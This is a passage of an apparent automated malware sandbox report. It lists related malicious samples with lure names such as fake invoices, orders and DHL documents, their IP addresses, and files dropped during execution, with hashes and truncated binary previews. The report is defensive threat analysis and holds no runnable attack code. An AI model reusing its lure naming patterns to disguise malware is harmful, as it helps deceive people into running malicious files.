                                                                                                • 104.20.184.68
                                                                                                Xero from westpac.htmGet hashmaliciousBrowse
                                                                                                • 104.19.149.54
                                                                                                eooedsjsjhskhkasdrvu0p[1].htmGet hashmaliciousBrowse
                                                                                                • 104.16.19.94
                                                                                                cm0Ubgm8Eu.exeGet hashmaliciousBrowse
                                                                                                • 162.159.135.233
                                                                                                IMG_5771098.xlsxGet hashmaliciousBrowse
                                                                                                • 172.67.172.17
                                                                                                CLOUDFLARENETUSorder inquiry.exeGet hashmaliciousBrowse
                                                                                                • 172.67.188.154
                                                                                                Funded.jarGet hashmaliciousBrowse
                                                                                                • 104.23.98.190
                                                                                                RFQ_110199282773666355627277288.exeGet hashmaliciousBrowse
                                                                                                • 162.159.135.233
                                                                                                Payment.exeGet hashmaliciousBrowse
                                                                                                • 104.21.19.200
                                                                                                Cancellation_Letter_78205198-02242021.xlsGet hashmaliciousBrowse
                                                                                                • 172.67.146.71
                                                                                                Cancellation_Letter_78205198-02242021.xlsGet hashmaliciousBrowse
                                                                                                • 104.21.73.165
                                                                                                gQcKVtx6h0.dllGet hashmaliciousBrowse
                                                                                                • 104.20.184.68
                                                                                                qt1dVk6hrj.dllGet hashmaliciousBrowse
                                                                                                • 104.20.184.68
                                                                                                PnzVGXpv4C.dllGet hashmaliciousBrowse
                                                                                                • 104.20.185.68
                                                                                                TcNpJ6Lerr.dllGet hashmaliciousBrowse
                                                                                                • 104.20.185.68
                                                                                                doTCeuxsZh.dllGet hashmaliciousBrowse
                                                                                                • 104.20.184.68
                                                                                                P1ON2FMKtb.dllGet hashmaliciousBrowse
                                                                                                • 104.20.185.68
                                                                                                83dLkz7iFE.dllGet hashmaliciousBrowse
                                                                                                • 104.20.184.68
                                                                                                Zh9kAls1Tz.dllGet hashmaliciousBrowse
                                                                                                • 104.20.185.68
                                                                                                iyLA8EXSBg.dllGet hashmaliciousBrowse
                                                                                                • 104.20.185.68
                                                                                                2Mb4u6AUaI.dllGet hashmaliciousBrowse
                                                                                                • 104.20.184.68
                                                                                                Xero from westpac.htmGet hashmaliciousBrowse
                                                                                                • 104.19.149.54
                                                                                                eooedsjsjhskhkasdrvu0p[1].htmGet hashmaliciousBrowse
                                                                                                • 104.16.19.94
                                                                                                cm0Ubgm8Eu.exeGet hashmaliciousBrowse
                                                                                                • 162.159.135.233
                                                                                                IMG_5771098.xlsxGet hashmaliciousBrowse
                                                                                                • 172.67.172.17

                                                                                                JA3 Fingerprints

                                                                                                No context

                                                                                                Dropped Files

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exeem6eElVbOm.exeGet hashmaliciousBrowse
                                                                                                  Purchase Order_Pdf.exeGet hashmaliciousBrowse
                                                                                                    Fireman.exeGet hashmaliciousBrowse
                                                                                                      NEW ORDER.exeGet hashmaliciousBrowse
                                                                                                        CN-Invoice-XXXXX9808-19011143287993.exeGet hashmaliciousBrowse
                                                                                                          payment confirmation 0029175112.exeGet hashmaliciousBrowse
                                                                                                            Vrxs6evJO7.exeGet hashmaliciousBrowse
                                                                                                              SecuriteInfo.com.Trojan.GenericKD.36380495.3131.exeGet hashmaliciousBrowse
                                                                                                                RMe2JcmlSh.exeGet hashmaliciousBrowse
                                                                                                                  New Order 2300030317388 InterMetro.exeGet hashmaliciousBrowse
                                                                                                                    CN-Invoice-XXXXX9808-19011143287989.exeGet hashmaliciousBrowse
                                                                                                                      PURCHASE ITEMS.exeGet hashmaliciousBrowse
                                                                                                                        CN-Invoice-XXXXX9808-19011143287992.exeGet hashmaliciousBrowse
                                                                                                                          quotation_PR # 00459182..exeGet hashmaliciousBrowse
                                                                                                                            PURCHASE ORDER CONFIRMATION.exeGet hashmaliciousBrowse
                                                                                                                              New Order.exeGet hashmaliciousBrowse
                                                                                                                                PO#87498746510.exeGet hashmaliciousBrowse
                                                                                                                                  TT.exeGet hashmaliciousBrowse
                                                                                                                                    TT.exeGet hashmaliciousBrowse
                                                                                                                                      CN-Invoice-XXXXX9808-19011143287989.exeGet hashmaliciousBrowse

                                                                                                                                        Created / dropped Files

                                                                                                                                        C:\ProgramData\Microsoft\Network\Downloader\edb.log
                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                        File Type:data
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):4096
                                                                                                                                        Entropy (8bit):0.599842240294713
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:6:bl/ek1GaD0JOCEfMuaaD0JOCEfMKQmDy/tAl/gz2cE0fMbhEZolrRSQ2hyYIIT:bdNGaD0JcaaD0JwQQCtAg/0bjSQJ
                                                                                                                                        MD5:6F61DEA46D7A2AFAAB41B4070D759295
                                                                                                                                        SHA1:4A2437508009FF723BBA2CB5DDEC269CE15F9092
                                                                                                                                        SHA-256:57D2811971E5CFDB68E8431DC241DFD1E9175D6B41CFC82800A15343A4E40C22
                                                                                                                                        SHA-512:6391DFDD7048ED42AB216347FAD27CC25EFA773764ED699ADD4BE648D8D1906A18997F26745CC39BEECFFBE86759C25635C5AAF5CE26E91EF81CE95C030C7D46
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: ....E..h..(..........y............... ..1C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@........................y............&......e.f.3...w.......................3...w..................h..C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b...G............................................................................................................................................................................................................
                                                                                                                                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0xfdcbf2ba, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):32768
                                                                                                                                        Entropy (8bit):0.09625771879899726
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:6:LfzOsAzwl/+31RIE11Y8TRXq1qKNfzOsAzwl/+31RIE11Y8TRXq1qK:rzDA0+lO4blq1qKNzDA0+lO4blq1qK
                                                                                                                                        MD5:1E6534AB1157D151BB0B375A38157E62
                                                                                                                                        SHA1:4E3C06FBB751B48F857F844489ED5A71DA36BF96
                                                                                                                                        SHA-256:639AA1AB9D16ADE253B48177E182EB28D4441EB094E6B4E871F476B0D77D1A7F
                                                                                                                                        SHA-512:5A6B18B60C607065CEA5BA1F2843939846B434E388D6F40F465ED23E0B555F1D2F4CB3CEDBA642541C44E66ABDE3F4A25DB2299BA3D5116BA42CB78C3841FCCA
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: ...... ................e.f.3...w........................&..........w.......y..h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w......................................................................................................................................................................................................................................y..;.....y...................8......y..........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                        C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                        File Type:data
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):8192
                                                                                                                                        Entropy (8bit):0.11227145912104357
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3:uQ/7Evz5ncr+j8l/bJdAtiadXill:uQ/i1nu+j8t4f1G
                                                                                                                                        MD5:E7E5B09291619E6ED7048AA6633A27B4
                                                                                                                                        SHA1:F862C511B3C9FA4D704B051DE8F82C268B1B1F27
                                                                                                                                        SHA-256:691CE1872FC854A85D88B875EF6AC93168840FB30FBDB1A21392CBBC9B4C644A
                                                                                                                                        SHA-512:96AC232595C858DA2C8AFB9D6E97536152D1770A83914ECFF49E343FFBBF92B51F0EF409DDDEF4486840F21885EF294D24401080625F666688F7A6FCC8265E45
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: .vN......................................3...w.......y.......w...............w.......w....:O.....w....................8......y..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER5CDC.tmp.dmp
                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                        File Type:Mini DuMP crash report, 15 streams, Thu Feb 25 19:05:43 2021, 0x1205a4 type
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):310751
                                                                                                                                        Entropy (8bit):3.924033646152372
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3072:5oN/JXd0fjd+pO6Dr5CvnK9gIOgF5T0FUCgUhW1z9FP8C1:5Qn0YpIvK9RpDTsTjh4FZ
                                                                                                                                        MD5:0B37C4E76165F0F8BC3BDB6C49EF73BE
                                                                                                                                        SHA1:FD43FB2ED3D844C762DBD19FDBF87047BE0F9C71
                                                                                                                                        SHA-256:9B0DBF8E7CB28B1BF075E4F0377E732BE016489AECA26674B6F20E97F31A25B9
                                                                                                                                        SHA-512:3E57184B64FDAFB28787AD185A71A5F770EEC5428CBCB06C30F7965E8BF51AC5E7B2A553B7ACB54D0B8C80D72C48A539553DEA4F6F6D82514AD7D661852B5643
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: MDMP....... .........7`...................U...........B.......-......GenuineIntelW...........T.............7`.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERB146.tmp.WERInternalMetadata.xml
                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                        File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):8478
                                                                                                                                        Entropy (8bit):3.6963698277077177
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:192:Rrl7r3GLNiajX6fCf6YIzmSUoQdxYgmfZESlCprq89bf5sfXB1m:RrlsNicX6i6YdSUoAugmfGSOfSfa
                                                                                                                                        MD5:64224C14CE5937E2E186641BBBF8B6ED
                                                                                                                                        SHA1:55C0F5DA37FA39C82F9C8123413A7B32741427ED
                                                                                                                                        SHA-256:B72481E23AA36ABE05B6E7BC1F23F55EB5F7F48E49A058A40A5D70ACFF76F561
                                                                                                                                        SHA-512:D85E172916766CA7010BD6DAB40001EEF74387F1B33804F26488B140C86BBCF23246692FBCE038EDCFD905A9006B07C767A8B1155B5AB26C94039F5582F34C60
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.3.0.8.<./.P.i.d.>.......
                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERBA40.tmp.xml
                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):4779
                                                                                                                                        Entropy (8bit):4.504512037902914
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:48:cvIwSD8zspJgtWI9fvWSC8Bk8fm8M4JmFFbE++q8v5brisZJQN7d:uITf7U+SNXJKE+Kdrlq7d
                                                                                                                                        MD5:B7572ACB61B50439E97B6B5AC21AA9B8
                                                                                                                                        SHA1:369F1EBF65248A5448AC2BC374710E15C5978263
                                                                                                                                        SHA-256:40885DCC60CE8A3584EEDC6543F4236147DC9B098444053CD51AFBC997B9F336
                                                                                                                                        SHA-512:AE3E1FF4FB86B4058D0B5F0316AA87C90E6A0A394F35A471EB4301719733DDDA56E0E8B243D9C56FFD6AD68950B0CF14DB448885A9BFD936C4CB26578A9142BA
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="877216" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERBA6D.tmp.csv
                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                        File Type:data
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):53038
                                                                                                                                        Entropy (8bit):3.0506082513097774
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:1536:AkHI3BuivARR1sCXq1iZxvl/HgkyCOTcezr/zWb8SzuNctG:AkHI3BuivARR1sCXq1iZxvl/HgzCOTcG
                                                                                                                                        MD5:C1ECD9CCFEAEF5CB9E0ADB8447D439E9
                                                                                                                                        SHA1:EAC5693874A6B3275E75B964B0CDE9B3CE844A3E
                                                                                                                                        SHA-256:54AF9F89796EF54CA43316CD45A9D9EFD8C17BB609627EFB0C0E8C595E73618A
                                                                                                                                        SHA-512:A088356D30D3D28AD807AC9C7F0FB7B149B91D7A8F0E5FC829B629C81E2F863747033E7161CED30463F5EA220954AF2E24BC48D9F1E0FEE410551DA1040ED6E4
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERC105.tmp.txt
                                                                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                                                                        File Type:data
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):13340
                                                                                                                                        Entropy (8bit):2.705427748316365
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:96:9GiZYWl1Pdi4YEYL8V74XHwUYEZ0kGCtViOPYHrnwAnNAaJgBvJ2FI/iDC:9jZDHZzhFk6KaJgBv4a6DC
                                                                                                                                        MD5:377971C7CBF8626D6D66041FC8A692DA
                                                                                                                                        SHA1:0C4653A8E9435E04750AAF24FD046AC4CB551A5C
                                                                                                                                        SHA-256:79F474885A49DA3B953D6E9C5A10D1D81871E1DD91314ADBA1830375E8D2AB79
                                                                                                                                        SHA-512:42CE25B7B2EEBCEBBCBFB65514991F9BB3FCBA5E216DEAE970F422A9914810BB47C624BA21EA551F6C932EB57321160356DA7BD09857F122F304768E14CC4FEB
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        File Type:data
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):14734
                                                                                                                                        Entropy (8bit):4.993014478972177
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:384:cBVoGIpN6KQkj2Wkjh4iUxtaKdROdBLNXp5nYoGib4J:cBV3IpNBQkj2Lh4iUxtaKdROdBLNZBYH
                                                                                                                                        MD5:8D5E194411E038C060288366D6766D3D
                                                                                                                                        SHA1:DC1A8229ED0B909042065EA69253E86E86D71C88
                                                                                                                                        SHA-256:44EEE632DEDFB83A545D8C382887DF3EE7EF551F73DD55FEDCDD8C93D390E31F
                                                                                                                                        SHA-512:21378D13D42FBFA573DE91C1D4282B03E0AA1317B0C37598110DC53900C6321DB2B9DF27B2816D6EE3B3187E54BF066A96DB9EC1FF47FF86FEA36282AB906367
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4bb22kea.eza.ps1
                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):1
                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3:U:U
                                                                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: 1
                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pajpkrdd.mb4.psm1
                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):1
                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3:U:U
                                                                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: 1
                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uefhrjb0.45o.ps1
                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):1
                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3:U:U
                                                                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: 1
                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zmbheasb.dva.psm1
                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        File Type:very short file (no magic)
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):1
                                                                                                                                        Entropy (8bit):0.0
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:3:U:U
                                                                                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                        Malicious:false
                                                                                                                                        Preview: 1
                                                                                                                                        C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exe
                                                                                                                                        Process:C:\Users\user\Desktop\DHL_document1102202068090891.exe
                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):91000
                                                                                                                                        Entropy (8bit):6.241345766746317
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                                                                                                        MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                                                        SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                                                                                                        SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                                                                                                        SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                                                                                                        Malicious:false
                                                                                                                                        Antivirus:
                                                                                                                                        • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                        Joe Sandbox View:
                                                                                                                                        • Filename: em6eElVbOm.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: Purchase Order_Pdf.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: Fireman.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: NEW ORDER.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: CN-Invoice-XXXXX9808-19011143287993.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: payment confirmation 0029175112.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: Vrxs6evJO7.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: SecuriteInfo.com.Trojan.GenericKD.36380495.3131.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: RMe2JcmlSh.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: New Order 2300030317388 InterMetro.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: CN-Invoice-XXXXX9808-19011143287989.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: PURCHASE ITEMS.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: CN-Invoice-XXXXX9808-19011143287992.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: quotation_PR # 00459182..exe, Detection: malicious, Browse
                                                                                                                                        • Filename: PURCHASE ORDER CONFIRMATION.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: New Order.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: PO#87498746510.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: TT.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: TT.exe, Detection: malicious, Browse
                                                                                                                                        • Filename: CN-Invoice-XXXXX9808-19011143287989.exe, Detection: malicious, Browse
                                                                                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....*).....*)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................
